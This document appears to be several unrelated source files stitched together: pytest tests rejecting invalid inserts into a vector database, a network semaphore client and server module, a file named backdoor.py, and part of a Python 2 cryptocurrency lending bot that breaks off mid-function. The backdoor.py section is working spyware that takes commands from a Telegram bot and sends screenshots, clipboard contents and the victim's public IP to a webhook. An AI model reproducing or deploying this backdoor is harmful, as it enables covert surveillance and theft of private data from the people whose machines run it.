        params=gen_invalid_ints()
    )
    def get_entity_id(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=gen_invalid_vectors()
    )
    def get_field_vectors_value(self, request):
        yield request.param

    @pytest.mark.level(2)
    def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
        # binary entity with a field renamed to an invalid name must be rejected
        tmp_entity = update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entity)

    @pytest.mark.level(2)
    def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
        # binary entity with an invalid value in the int64 field must be rejected
        tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entity)

    @pytest.mark.level(2)
    def test_insert_with_invalid_field_entity_value(self, connect, binary_collection, get_field_vectors_value):
        # single binary entity with an invalid vector value must be rejected
        tmp_entity = copy.deepcopy(default_binary_entity)
        src_vectors = tmp_entity[-1]["values"]
        src_vectors[0] = get_field_vectors_value
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entity)

    @pytest.mark.level(2)
    def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
        '''
        target: test insert, with using customize ids, which are not int64
        method: create collection and insert entities in it
        expected: raise an exception
        '''
        entity_id = get_entity_id
        ids = [entity_id for _ in range(default_nb)]
        with pytest.raises(Exception):
            connect.insert(binary_id_collection, default_binary_entities, ids)

    @pytest.mark.level(2)
    def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
        # binary entity with an invalid field type must be rejected
        field_type = get_field_type
        tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entity)

    @pytest.mark.level(2)
    def test_insert_with_invalid_field_entities_value(self, connect, binary_collection, get_field_vectors_value):
        # batch of binary entities with an invalid vector value must be rejected
        tmp_entities = copy.deepcopy(default_binary_entities)
        src_vector = tmp_entities[-1]["values"]
        src_vector[1] = get_field_vectors_value
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entities)
|
__init__.py | # vim: sw=4:ts=4:et
#
# all of the engines that do stuff need to coordinate with each other
# to make sure they don't overwhelm the resources they use
# see semaphores.txt
import datetime
import ipaddress
import logging
import multiprocessing
import os
import re
import socket
import sys
import threading
import time
from math import floor
from threading import Thread, Semaphore, RLock
import saq
from saq.constants import *
from saq.error import report_exception
from saq.performance import record_metric
from saq.service import *
# this is a fall back device to be used if the network semaphore is unavailable
# semaphores defined in the configuration file
defined_fallback_semaphores = {} # key = semaphore name, value = LoggingSemaphore(count)
# semaphores defined during runtime (these are deleted after release to 0)
undefined_fallback_semaphores = {} # key = semaphore name, value = LoggingSemaphore(count)
# guards all reads/writes of undefined_fallback_semaphores
undefined_fallback_semaphores_lock = threading.RLock()
def add_undefined_fallback_semaphore(name, count=1):
    """Adds the given semaphore as an undefined fallback semaphore. Returns the added semaphore object."""
    with undefined_fallback_semaphores_lock:
        semaphore = LoggingSemaphore(count)
        undefined_fallback_semaphores[name] = semaphore
        logging.info(f"added undefined fallback semaphore {name} with limit {count}")
        return semaphore
def maintain_undefined_semaphores():
    """Drop undefined fallback semaphores whose holder count has returned to zero."""
    with undefined_fallback_semaphores_lock:
        # collect first, then delete -- avoids mutating the dict while iterating
        targets = [name for name, semaphore in undefined_fallback_semaphores.items()
                   if semaphore.count == 0]
        for target in targets:
            logging.debug(f"finished with undefined semaphore {target}")
            del undefined_fallback_semaphores[target]
        if undefined_fallback_semaphores:
            logging.info(f"tracking {len(undefined_fallback_semaphores)} undefined semaphores")
def initialize_fallback_semaphores():
    """This needs to be called once at the very beginning of starting ACE."""
    global defined_fallback_semaphores
    defined_fallback_semaphores = {}
    # we need some fallback functionality for when the network semaphore server is down
    # these semaphores serve that purpose; the configured limit is the global
    # connection cap for the resource, used locally when coordination fails
    # (presumably intended to be divided among engines -- see original design note)
    prefix = 'semaphore_'
    section = saq.CONFIG['service_network_semaphore']
    for key in section.keys():
        if not key.startswith(prefix):
            continue
        semaphore_name = key[len(prefix):]
        # never allow a limit below one
        fallback_limit = max(section.getint(key), 1)
        defined_fallback_semaphores[semaphore_name] = LoggingSemaphore(fallback_limit)
class LoggingSemaphore(Semaphore):
    """A threading.Semaphore that tracks and logs how many holders it has.

    `count` is the number of currently-held acquisitions (guarded by
    `count_lock`); `semaphore_name` is an optional label used in log output.
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.count = 0
        self.count_lock = RLock()
        self.semaphore_name = None

    def acquire(self, *args, **kwargs):
        """Acquire the semaphore; on success, bump and log the held count."""
        result = super().acquire(*args, **kwargs)
        if result:
            with self.count_lock:
                self.count += 1
            logging.debug(f"acquire: semaphore {self.semaphore_name} count is {self.count}")
        return result

    def release(self, *args, **kwargs):
        """Release the semaphore and decrement the held count."""
        # consistency fix: use the zero-argument super() form like the rest
        # of this class (was super(LoggingSemaphore, self).release(...))
        super().release(*args, **kwargs)
        with self.count_lock:
            self.count -= 1
        logging.debug(f"release: semaphore {self.semaphore_name} count is {self.count}")
class NetworkSemaphoreClient(object):
    def __init__(self, cancel_request_callback=None):
        """Create a client for the network semaphore server.

        cancel_request_callback: optional zero-argument callable; when it
        returns True an in-progress acquire request is abandoned.
        """
        # the remote connection to the network semaphore server
        self.socket = None
        # this is set to True if the client was able to acquire a semaphore
        self.semaphore_acquired = False
        # the name of the acquired semaphore
        self.semaphore_name = None
        # a failsafe thread to make sure we end up releasing the semaphore
        self.failsafe_thread = None
        # set when the semaphore is released (causing the failsafe thread to exit)
        self.release_event = None
        # reference to the relevant configuration section
        self.config = saq.CONFIG['service_network_semaphore']
        # if we ended up using a fallback semaphore
        self.fallback_semaphore = None
        # use this to cancel the request to acquire a semaphore
        self.cancel_request_flag = False
        # OR use this function to determine if we should cancel the request
        # the function returns True if the request should be cancelled, False otherwise
        self.cancel_request_callback = cancel_request_callback
@property
def request_is_cancelled(self):
"""Returns True if the request has been cancelled, False otherwise.
The request is cancelled if cancel_request_flag is True OR
cancel_request_callback is defined and it returns True."""
return self.cancel_request_flag or ( self.cancel_request_callback is not None
and self.cancel_request_callback() )
def acquire(self, semaphore_name, timeout=None):
if self.semaphore_acquired:
logging.warning(f"semaphore {self.semaphore_name} already acquired")
return True
deadline = None
if timeout is not None:
deadline = datetime.datetime.now() + datetime.timedelta(seconds=timeout)
try:
self.socket = socket.socket()
logging.debug("attempting connection to {} port {}".format(self.config['remote_address'], self.config.getint('remote_port')))
self.socket.connect((self.config['remote_address'], self.config.getint('remote_port')))
logging.debug(f"requesting semaphore {semaphore_name}")
# request the semaphore
self.socket.sendall('acquire:{}|'.format(semaphore_name).encode('ascii'))
# wait for the acquire to complete
wait_start = datetime.datetime.now()
while not self.request_is_cancelled:
command = self.socket.recv(128).decode('ascii')
if command == '':
raise RuntimeError("detected client disconnect")
logging.debug(f"received command {command} from server")
# deal with the possibility of multiple commands sent in a single packet
# (remember to strip the last pipe)
commands = command[:-1].split('|')
if 'locked' in commands:
logging.debug(f"semaphore {semaphore_name} locked")
self.semaphore_acquired = True
self.semaphore_name = semaphore_name
self.release_event = threading.Event()
self.start_failsafe_monitor()
return True
elif all([x == 'wait' for x in commands]):
pass
else:
raise ValueError(f"received invalid command {command}")
# have we timed out waiting?
if deadline and datetime.datetime.now() >= deadline:
logging.error(f"attempt to acquire semaphore {semaphore_name} timed out")
try:
self.socket.close()
except Exception as e:
pass
return False
logging.debug(f"semaphore request for {semaphore_name} cancelled")
try:
self.socket.close()
except Exception as e:
pass
return False
except Exception as e:
logging.error(f"unable to acquire network semaphore: {e}")
try:
self.socket.close()
except Exception as e:
pass
# use the fallback semaphore
try:
logging.warning(f"acquiring fallback semaphore {semaphore_name}")
while not self.request_is_cancelled:
try:
semaphore = defined_fallback_semaphores[semaphore_name]
except KeyError:
try:
with undefined_fallback_semaphores_lock:
semaphore = undefined_fallback_semaphores[semaphore_name]
except KeyError:
semaphore = add_undefined_fallback_semaphore(semaphore_name)
if semaphore.acquire(blocking=True, timeout=0.1):
logging.debug(f"fallback semaphore {semaphore_name} acquired")
self.fallback_semaphore = semaphore
self.semaphore_acquired = True
self.semaphore_name = semaphore_name
self.release_event = threading.Event()
self.start_failsafe_monitor()
return True
if deadline and datetime.datetime.now() >= deadline:
logging.error(f"attempt to acquire semaphore {semaphore_name} timed out")
return False
return False
except Exception as e:
logging.error(f"unable to use fallback semaphore {semaphore_name}: {e}")
report_exception()
return False
def cancel_request(self):
self.cancel_request_flag = True
def failsafe_loop(self):
# we start a side-thread to monitor this time the semaphore is held
# we basically just log the fact that we still have it so we can
# see that when we are debugging
try:
acquire_time = datetime.datetime.now()
while not self.release_event.wait(3):
logging.debug("semaphore {} lock time {}".format(
self.semaphore_name, datetime.datetime.now() - acquire_time))
# if we are still in network mode then send a keep-alive message to the server
if self.fallback_semaphore is None:
self.socket.sendall('wait|'.encode('ascii'))
logging.debug(f"detected release of semaphore {self.semaphore_name}")
except Exception as e:
logging.error(f"failsafe on semaphore {self.semaphore_name} error {e}")
try:
self.socket.close()
except:
pass
def start_failsafe_monitor(self):
self.failsafe_thread = Thread(target=self.failsafe_loop, name=f"Failsafe {self.semaphore_name}")
self.failsafe_thread.daemon = True
self.failsafe_thread.start()
def release(self):
if not self.semaphore_acquired:
logging.warning(f"release called on unacquired semaphore {self.semaphore_name}")
# are we releasing a fallback semaphore?
if self.fallback_semaphore is not None:
logging.debug(f"releasing fallback semaphore {self.semaphore_name}")
try:
self.fallback_semaphore.release()
except Exception as e:
logging.error(f"unable to release fallback semaphore {self.semaphore_name}: {e}")
report_exception(e)
# make sure we set this so that the monitor thread exits
self.semaphore_acquired = False
self.release_event.set()
self.failsafe_thread.join()
maintain_undefined_semaphores()
return
try:
# send the command for release
logging.debug(f"releasing semaphore {self.semaphore_name}")
self.socket.sendall("release|".encode('ascii'))
# wait for the ok
command = self.socket.recv(128).decode('ascii')
if command == '':
logging.debug("detected client disconnect")
return
logging.debug(f"recevied response from server: {command}")
if command == 'ok|':
logging.debug(f"successfully released semaphore {self.semaphore_name}")
return
else:
logging.error("invalid response from server")
return
except Exception as e:
logging.error(f"error trying to release semaphore {self.semaphore_name}: {e}")
finally:
try:
self.socket.close()
except Exception:
pass
# make sure we set this so that the monitor thread exits
self.semaphore_acquired = False
self.release_event.set()
self.failsafe_thread.join()
class NetworkSemaphoreServer(ACEService):
    """ACE service implementing the network semaphore server.

    Listens on a TCP socket, validates the client's source address against a
    configured allow list, and serves one semaphore per client connection
    using a simple pipe-delimited text protocol (acquire/wait/locked/
    release/ok). Semaphores are either defined in configuration or created
    on demand ("undefined") and reaped when no longer held.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(
            service_config=saq.CONFIG['service_network_semaphore'],
            *args,
            **kwargs)

        # the main thread that listens for new connections
        self.server_thread = None
        # the main listening socket
        self.server_socket = None

        # configuration settings
        if 'service_network_semaphore' not in saq.CONFIG:
            logging.error("missing configuration service_network_semaphore")
            sys.exit(1)

        # binding address
        self.bind_address = self.service_config['bind_address']
        self.bind_port = self.service_config.getint('bind_port')

        # source IP addresses that are allowed to connect
        self.allowed_ipv4 = [ipaddress.ip_network(x.strip()) for x in self.service_config['allowed_ipv4'].split(',')]

        # load and initialize all the semaphores we're going to use
        self.defined_semaphores = {} # key = semaphore_name, value = LoggingSemaphore
        self.undefined_semaphores = {} # key = semaphore_name, value = LoggingSemaphore
        self.undefined_semaphores_lock = threading.RLock()

        # we keep some stats and metrics on semaphores in this directory
        self.stats_dir = os.path.join(saq.DATA_DIR, self.service_config['stats_dir'])
        if not os.path.isdir(self.stats_dir):
            try:
                os.makedirs(self.stats_dir)
            except Exception as e:
                logging.error(f"unable to create directory {self.stats_dir}: {e}")
                sys.exit(1)

        # a thread monitors and records statistics
        self.monitor_thread = None

    def add_undefined_semaphore(self, name, count=1):
        """Adds a new undefined network semaphore with the given name and optional count.
        Returns the created semaphore."""
        with self.undefined_semaphores_lock:
            self.undefined_semaphores[name] = LoggingSemaphore(count)
            self.undefined_semaphores[name].semaphore_name = name
            logging.info(f"adding undefined semaphore {name}")
            return self.undefined_semaphores[name]

    def maintain_undefined_semaphores(self):
        """Drop undefined semaphores that currently have no holders."""
        with self.undefined_semaphores_lock:
            targets = []
            for semaphore_name in self.undefined_semaphores.keys():
                if self.undefined_semaphores[semaphore_name].count == 0:
                    targets.append(semaphore_name)

            for target in targets:
                logging.debug(f"finished with undefined semaphore {target}")
                del self.undefined_semaphores[target]

            if self.undefined_semaphores:
                logging.info(f"tracking {len(self.undefined_semaphores)} undefined semaphores")

    def load_configured_semaphores(self):
        """Loads all network semaphores defined in the configuration."""
        # config keys look like semaphore_<name> = <count>
        for key in self.service_config.keys():
            if key.startswith('semaphore_'):
                semaphore_name = key[len('semaphore_'):]
                count = self.service_config.getint(key)
                self.defined_semaphores[semaphore_name] = LoggingSemaphore(count)
                self.defined_semaphores[semaphore_name].semaphore_name = semaphore_name

    def execute_service(self):
        """Service entry point: run the accept loop (inline when debugging)
        plus the stats monitor thread."""
        if self.service_is_debug:
            return self.server_loop()

        self.server_thread = Thread(target=self.server_loop, name="Network Server")
        self.server_thread.start()

        self.monitor_thread = Thread(target=self.monitor_loop, name="Monitor")
        self.monitor_thread.daemon = True
        self.monitor_thread.start()

        self.server_thread.join()
        self.monitor_thread.join()

    def stop_service(self, *args, **kwargs):
        """Stop the service; makes a throwaway local connection so the
        blocking accept() call returns and the server loop can exit."""
        super().stop_service(*args, **kwargs)
        try:
            logging.debug("closing network socket...")
            # force the accept() call to break
            try:
                s = socket.socket()
                s.connect((self.service_config['bind_address'], self.service_config.getint('bind_port')))
                s.close()
            except:
                pass # doesn't matter...
        except Exception as e:
            logging.error(f"unable to close network socket: {e}")

    def monitor_loop(self):
        """Once a second, dump the current holder count of every defined
        semaphore to the semaphore.status file in the stats directory."""
        semaphore_status_path = os.path.join(self.stats_dir, 'semaphore.status')
        while not self.is_service_shutdown:
            with open(semaphore_status_path, 'w') as fp:
                for semaphore in self.defined_semaphores.values():
                    # BUGFIX: the original write was missing the trailing
                    # newline, collapsing every semaphore onto a single line
                    fp.write(f'{semaphore.semaphore_name}: {semaphore.count}\n')

            time.sleep(1)

    def server_loop(self):
        """Main accept loop: bind, listen and hand each allowed connection to
        client_loop (on its own daemon thread unless in debug mode). The
        listener is re-created after uncaught errors until shutdown."""
        self.load_configured_semaphores()

        while not self.is_service_shutdown:
            try:
                self.server_socket = socket.socket() # defaults to AF_INET, SOCK_STREAM
                self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                self.server_socket.bind((self.bind_address, self.bind_port))
                self.server_socket.listen(5)

                while not self.is_service_shutdown:
                    logging.debug(f"waiting for next connection on {self.bind_address}:{self.bind_port}")
                    client_socket, remote_address = self.server_socket.accept()
                    remote_host, remote_port = remote_address
                    logging.info(f"got connection from {remote_host}:{remote_port}")
                    if self.is_service_shutdown:
                        return

                    # only accept connections from the configured networks
                    allowed = False
                    remote_host_ipv4 = ipaddress.ip_address(remote_host)
                    for ipv4_network in self.allowed_ipv4:
                        if remote_host_ipv4 in ipv4_network:
                            allowed = True
                            break

                    if not allowed:
                        logging.warning(f"blocking invalid remote host {remote_host}")
                        try:
                            client_socket.close()
                        except:
                            pass

                        continue

                    # start a thread to deal with this client
                    if self.service_is_debug:
                        self.client_loop(remote_host, remote_port, client_socket)
                    else:
                        t = Thread(target=self.client_loop, args=(remote_host, remote_port, client_socket), name=f"Client {remote_host}")
                        t.daemon = True
                        t.start()

            except Exception as e:
                logging.error(f"uncaught exception: {e}")
                report_exception()
                # TODO clean up socket stuff to restart
                self.service_shutdown_event.wait(1)

    def client_loop(self, remote_host, remote_port, client_socket):
        """Handle one client connection: acquire the requested semaphore
        (sending wait| heartbeats while blocked), hold it until the client
        sends release| or disconnects, then release it."""
        remote_connection = f'{remote_host}:{remote_port}'
        try:
            logging.debug(f"started thread to handle connection from {remote_connection}")

            # read the next command from the client
            command = client_socket.recv(128).decode('ascii')
            if command == '':
                logging.debug("detected client disconnect")
                return

            logging.info(f"got command [{command}] from {remote_connection}")

            # super simple protocol
            # CLIENT SEND -> acquire:semaphore_name|
            # SERVER SEND -> wait|
            # SERVER SEND -> locked|
            # CLIENT SEND -> wait|
            # CLIENT SEND -> release|
            # SERVER SEND -> ok|
            # any invalid input or errors causes the connection to terminate
            m = re.match(r'^acquire:([^|]+)\|$', command)
            if m is None:
                logging.error(f"invalid command \"{command}\" from {remote_connection}")
                return

            semaphore_name = m.group(1)
            # use the configured semaphore if one exists, otherwise find or
            # create an undefined one
            try:
                semaphore = self.defined_semaphores[semaphore_name]
            except KeyError:
                with self.undefined_semaphores_lock:
                    try:
                        semaphore = self.undefined_semaphores[semaphore_name]
                    except KeyError:
                        semaphore = self.add_undefined_semaphore(semaphore_name, 1)

            semaphore_acquired = False
            request_time = datetime.datetime.now()
            try:
                while True:
                    logging.debug(f"attempting to acquire semaphore {semaphore_name}")
                    # 1 second timeout so we can heartbeat the client while blocked
                    semaphore_acquired = semaphore.acquire(blocking=True, timeout=1)
                    if not semaphore_acquired:
                        logging.info("{} waiting for semaphore {} cumulative waiting time {}".format(
                            remote_connection, semaphore_name, datetime.datetime.now() - request_time))
                        # send a heartbeat message back to the client
                        client_socket.sendall("wait|".encode('ascii'))
                        continue

                    logging.info(f"acquired semaphore {semaphore_name}")
                    client_socket.sendall("locked|".encode('ascii'))
                    break

                # now wait for either the client to release the semaphore
                # or for the connection to break
                release_time = datetime.datetime.now()
                while True:
                    command = client_socket.recv(128).decode('ascii')
                    if command == '':
                        logging.debug("detected client disconnect")
                        return

                    logging.debug("got command {} from {} semaphore capture time {}".format(
                        command, remote_connection, datetime.datetime.now() - release_time))

                    if not command.endswith('|'):
                        logging.error("missing pipe at end of command")
                        return

                    # deal with the possibility of multiple commands sent in a single packet
                    # strip the last pipe
                    # XXX not 100% sure on this but here it is
                    command = command[:-1]
                    commands = command.split('|')
                    if 'release' in commands:
                        # send the OK to the client
                        client_socket.sendall('ok|'.encode('ascii'))
                        break

                    if all([x == 'wait' for x in commands]):
                        logging.debug("got wait command(s)...")
                        continue

                    logging.error(f"invalid command {command} from connection {remote_connection}")
                    return

            finally:
                # always release what we acquired, even on protocol errors or
                # client disconnect
                try:
                    if semaphore_acquired:
                        semaphore.release()
                        logging.info(f"released semaphore {semaphore_name}")
                        self.maintain_undefined_semaphores()
                except Exception as e:
                    logging.error(f"error releasing semaphore {semaphore_name}: {e}")

        except Exception as e:
            logging.error(f"uncaught exception for {remote_connection}: {e}")

        finally:
            try:
                client_socket.close()
            except:
                pass
|
backdoor.py | import requests
import pyautogui
import win32clipboard
import time
import os
import threading
from typing import Dict
class Logger:
tgtoken = ""
dhook = ""
admin = "hkeydesign"
@classmethod
def log(cmd,message,ss):
response = True
r = requests.post(Logger.dhook,data={
'content':message
},files={
'file.png':ss
})
if str(r) != '<Response [204]>':
response = False
return response
@classmethod
def screen_shot(cmd):
pyautogui.screenshot(os.environ["USERPROFILE"] + r"\AppData\Local\Google\Chrome\User Data\resim.jpg")
jpgfile = open(os.environ["USERPROFILE"] + r"\AppData\Local\Google\Chrome\User Data\resim.jpg", "rb").read()
resp = Logger.log(f'Screen Shot',jpgfile)
return resp
@classmethod
def checkit(cmd) -> Dict[str, str]:
r = requests.get(f'https://api.telegram.org/bot{Logger.tgtoken}/getUpdates').json()
status = True
message = None
author = None
try:
message = r['result'][-1]['message']['text']
author = r['result'][-1]['message']['chat']['username']
date = r['result'][-1]['message']['date']
except:
status = False
result = {
'status':status,
'message':message,
'author':author,
'date':date
}
return result
@classmethod
def ip_adress(cmd):
r = requests.get('https://api.ipify.org')
ip = r.text
print(ip)
resp = Logger.log(f'Adress: {ip}',None)
return resp
@classmethod
def getcboard(cmd):
win32clipboard.OpenClipboard()
data = win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
resp = Logger.log(f'Clipboard: {data}',None)
return resp
def oneff():
last = {'date':None}
while True:
rsp = Logger.checkit()
if rsp['status'] == True and rsp['author'] == Logger.admin:
if rsp['message'] == 'ip' and rsp['date'] != last['date']:
ip = Logger.ip_adress()
last = rsp
elif rsp['message'] == 'foto' and rsp['date'] != last['date']:
Logger.screen_shot()
last = rsp
elif rsp['message'] == 'cboard' and rsp['date'] != last['date']:
Logger.getcboard()
last = rsp
time.sleep(2)
def sayac(n):
print(f'[{n*"-"}]', end="")
print('\b'*(n+1), end="")
for _ in range(n):
print(flush=True, end="")
print('*', end="")
time.sleep(10)
x = threading.Thread(target=oneff, args=())
x.start()
y = threading.Thread(target=sayac, args=(100,))
y.start()
|
Lending.py | # coding=utf-8
from decimal import Decimal
import sched
import time
import threading
# --- module collaborators, injected by init() ---
Config = None
api = None
log = None
Data = None
MaxToLend = None
Analysis = None

# smallest representable currency unit (1e-8)
SATOSHI = Decimal(10) ** -8

# --- lending settings, loaded from configuration by init() ---
sleep_time_active = 0
sleep_time_inactive = 0
sleep_time = 0
min_daily_rate = 0
max_daily_rate = 0
spread_lend = 0
gap_bottom = 0
gap_top = 0
xday_threshold = 0
xdays = 0
min_loan_size = 0
min_loan_sizes = {}
end_date = None
coin_cfg = None
dry_run = 0
transferable_currencies = []
keep_stuck_orders = True
hide_coins = True

# --- runtime state ---
# coins we already warned about, so each alert fires only once
coin_cfg_alerted = {}
max_active_alerted = {}
notify_conf = {}
# snapshot of provided loans from the previous notify_new_loans() run
loans_provided = {}
# limit of orders to request
loanOrdersRequestLimit = {}
defaultLoanOrdersRequestLimit = 100
def init(cfg, api1, log1, data, maxtolend, dry_run1, analysis, notify_conf1):
    """Wire up module collaborators and load all lending settings from config.

    Must be called once before any other function in this module; everything
    here communicates through module globals. Also starts the notification
    scheduler thread when any notification type is enabled.
    """
    global Config, api, log, Data, MaxToLend, Analysis, notify_conf
    Config = cfg
    api = api1
    log = log1
    Data = data
    MaxToLend = maxtolend
    Analysis = analysis
    notify_conf = notify_conf1

    global sleep_time, sleep_time_active, sleep_time_inactive, min_daily_rate, max_daily_rate, spread_lend, \
        gap_bottom, gap_top, xday_threshold, xdays, min_loan_size, end_date, coin_cfg, min_loan_sizes, dry_run, \
        transferable_currencies, keep_stuck_orders, hide_coins, scheduler

    # Config.get(section, option, default, lower_limit, upper_limit);
    # percent-style settings are divided by 100 into daily-rate fractions
    sleep_time_active = float(Config.get("BOT", "sleeptimeactive", None, 1, 3600))
    sleep_time_inactive = float(Config.get("BOT", "sleeptimeinactive", None, 1, 3600))
    min_daily_rate = Decimal(Config.get("BOT", "mindailyrate", None, 0.003, 5)) / 100
    max_daily_rate = Decimal(Config.get("BOT", "maxdailyrate", None, 0.003, 5)) / 100
    spread_lend = int(Config.get("BOT", "spreadlend", None, 1, 20))
    gap_bottom = Decimal(Config.get("BOT", "gapbottom", None, 0))
    gap_top = Decimal(Config.get("BOT", "gaptop", None, 0))
    xday_threshold = Decimal(Config.get("BOT", "xdaythreshold", None, 0.003, 5)) / 100
    xdays = str(Config.get("BOT", "xdays", None, 2, 60))
    min_loan_size = Decimal(Config.get("BOT", 'minloansize', None, 0.01))
    end_date = Config.get('BOT', 'endDate')
    coin_cfg = Config.get_coin_cfg()
    min_loan_sizes = Config.get_min_loan_sizes()
    dry_run = dry_run1
    transferable_currencies = Config.get_currencies_list('transferableCurrencies')
    keep_stuck_orders = Config.getboolean('BOT', "keepstuckorders", True)
    hide_coins = Config.getboolean('BOT', 'hideCoins', True)

    sleep_time = sleep_time_active  # Start with active mode

    # create the scheduler thread
    scheduler = sched.scheduler(time.time, time.sleep)
    if notify_conf['notify_summary_minutes']:
        # Wait 10 seconds before firing the first summary notifcation, then use the config time value for future updates
        scheduler.enter(10, 1, notify_summary, (notify_conf['notify_summary_minutes'] * 60, ))
    if notify_conf['notify_new_loans']:
        scheduler.enter(20, 1, notify_new_loans, (60, ))
    if not scheduler.empty():
        # notify_* callbacks re-schedule themselves, so this thread runs for
        # the lifetime of the bot
        t = threading.Thread(target=scheduler.run)
        t.start()
def get_sleep_time():
    """Return the current sleep interval (seconds) between lending loops."""
    global sleep_time
    return sleep_time
def set_sleep_time(usable):
    """Select the sleep interval based on activity.

    With zero usable currencies the bot idles using the inactive interval;
    otherwise it uses the (shorter) active interval.
    """
    global sleep_time
    sleep_time = sleep_time_inactive if usable == 0 else sleep_time_active
def notify_summary(sleep_time):
    """Send the periodic lending-summary notification and reschedule itself.

    Runs on the module scheduler thread. NOTE: relies on ``ex.message``,
    which only exists in Python 2.
    """
    try:
        log.notify(Data.stringify_total_lended(*Data.get_total_lended()), notify_conf)
    except Exception as ex:
        ex.message = ex.message if ex.message else str(ex)
        print("Error during summary notification: {0}".format(ex.message))
    # reschedule outside the try so a failed notification doesn't stop the cycle
    scheduler.enter(sleep_time, 1, notify_summary, (sleep_time, ))
def notify_new_loans(sleep_time):
    """Notify about every loan filled since the previous check, then reschedule.

    Compares the currently provided loans against the snapshot in the module
    global ``loans_provided``; new loans with the same currency/rate/duration
    are grouped into one message. NOTE: Python 2 only (uses dict.iteritems()).
    """
    global loans_provided
    try:
        new_provided = api.return_active_loans()['provided']
        if loans_provided:
            get_id_set = lambda loans: set([x['id'] for x in loans])  # lambda to return a set of ids from the api result
            loans_amount = {}
            loans_info = {}
            for loan_id in get_id_set(new_provided) - get_id_set(loans_provided):
                loan = [x for x in new_provided if x['id'] == loan_id][0]
                # combine loans with the same rate
                k = 'c'+loan['currency']+'r'+loan['rate']+'d'+str(loan['duration'])
                loans_amount[k] = float(loan['amount']) + (loans_amount[k] if k in loans_amount else 0)
                loans_info[k] = loan
            # send notifications with the grouped info
            for k, amount in loans_amount.iteritems():
                loan = loans_info[k]
                t = "{0} {1} loan filled for {2} days at a rate of {3:.4f}%"
                text = t.format(amount, loan['currency'], loan['duration'], float(loan['rate']) * 100)
                log.notify(text, notify_conf)
        loans_provided = new_provided
    except Exception as ex:
        ex.message = ex.message if ex.message else str(ex)
        print("Error during new loans notification: {0}".format(ex.message))
    # reschedule outside the try so a failed notification doesn't stop the cycle
    scheduler.enter(sleep_time, 1, notify_new_loans, (sleep_time, ))
def get_min_loan_size(currency):
    """Return the minimum loan size for *currency*.

    Per-currency overrides from ``min_loan_sizes`` take precedence over the
    global ``min_loan_size`` default.
    """
    if currency in min_loan_sizes:
        return Decimal(min_loan_sizes[currency])
    return min_loan_size
def create_lend_offer(currency, amt, rate):
    """Place a single loan offer for *amt* of *currency* at *rate*.

    Rates above ``xday_threshold`` are lent for ``xdays`` instead of the
    default 2 days. When an endDate is configured and (nearly) reached the
    bot logs, persists status and exits the process. NOTE: Python 2 only
    (print statement).
    """
    days = '2'
    # if (min_daily_rate - 0.000001) < rate and Decimal(amt) > min_loan_size:
    if float(amt) > get_min_loan_size(currency):
        if float(rate) > 0.0001:
            rate = float(rate) - 0.000001  # lend offer just below the competing one
        amt = "%.8f" % Decimal(amt)
        if float(rate) > xday_threshold:
            days = xdays
        if xday_threshold == 0:
            # threshold disabled: always use the default duration
            days = '2'
        if Config.has_option('BOT', 'endDate'):
            days_remaining = int(Data.get_max_duration(end_date, "order"))
            if int(days_remaining) <= 2:
                print "endDate reached. Bot can no longer lend.\nExiting..."
                log.log("The end date has almost been reached and the bot can no longer lend. Exiting.")
                log.refreshStatus(Data.stringify_total_lended(*Data.get_total_lended()), Data.get_max_duration(
                    end_date, "status"))
                log.persistStatus()
                exit(0)
            if int(days) > days_remaining:
                # never lend past the configured end date
                days = str(days_remaining)
        if not dry_run:
            msg = api.create_loan_offer(currency, amt, days, 0, rate)
            if days == xdays and notify_conf['notify_xday_threshold']:
                text = "{0} {1} loan placed for {2} days at a rate of {3:.4f}%".format(amt, currency, days, rate * 100)
                log.notify(text, notify_conf)
            log.offer(amt, currency, rate, days, msg)
def cancel_all():
    """Cancel all open loan offers so their balance can be re-lent.

    With ``keep_stuck_orders`` enabled, offers for a currency are only
    cancelled when the resulting free balance would still satisfy the
    minimum loan size (otherwise the coins would be stuck unlendable).
    NOTE: Python 2 only (print statement).
    """
    loan_offers = api.return_open_loan_offers()
    available_balances = api.return_available_account_balances('lending')
    for CUR in loan_offers:
        if CUR in coin_cfg and coin_cfg[CUR]['maxactive'] == 0:
            # don't cancel disabled coin
            continue
        if keep_stuck_orders:
            # sum the free balance plus everything currently tied up in offers
            lending_balances = available_balances['lending']
            if isinstance(lending_balances, dict) and CUR in lending_balances:
                cur_sum = float(available_balances['lending'][CUR])
            else:
                cur_sum = 0
            for offer in loan_offers[CUR]:
                cur_sum += float(offer['amount'])
        else:
            # force the cancel path below
            cur_sum = float(get_min_loan_size(CUR)) + 1
        if cur_sum >= float(get_min_loan_size(CUR)):
            for offer in loan_offers[CUR]:
                if not dry_run:
                    try:
                        msg = api.cancel_loan_offer(CUR, offer['id'])
                        log.cancelOrders(CUR, msg)
                    except Exception as ex:
                        ex.message = ex.message if ex.message else str(ex)
                        log.log("Error canceling loan offer: {0}".format(ex.message))
        else:
            print "Not enough " + CUR + " to lend if bot canceled open orders. Not cancelling."
def lend_all():
    """Run one lending pass over every currency with a lending balance.

    ``lend_cur`` raises StopIteration after raising a currency's order-book
    request limit; in that case the whole pass is restarted. Finally adjusts
    the sleep time based on how many currencies were actually lendable.
    """
    total_lended = Data.get_total_lended()[0]
    lending_balances = api.return_available_account_balances("lending")['lending']
    if dry_run:  # just fake some numbers, if dryrun (testing)
        lending_balances = Data.get_on_order_balances()

    # Fill the (maxToLend) balances on the botlog.json for display it on the web
    for cur in sorted(total_lended):
        if len(lending_balances) == 0 or cur not in lending_balances:
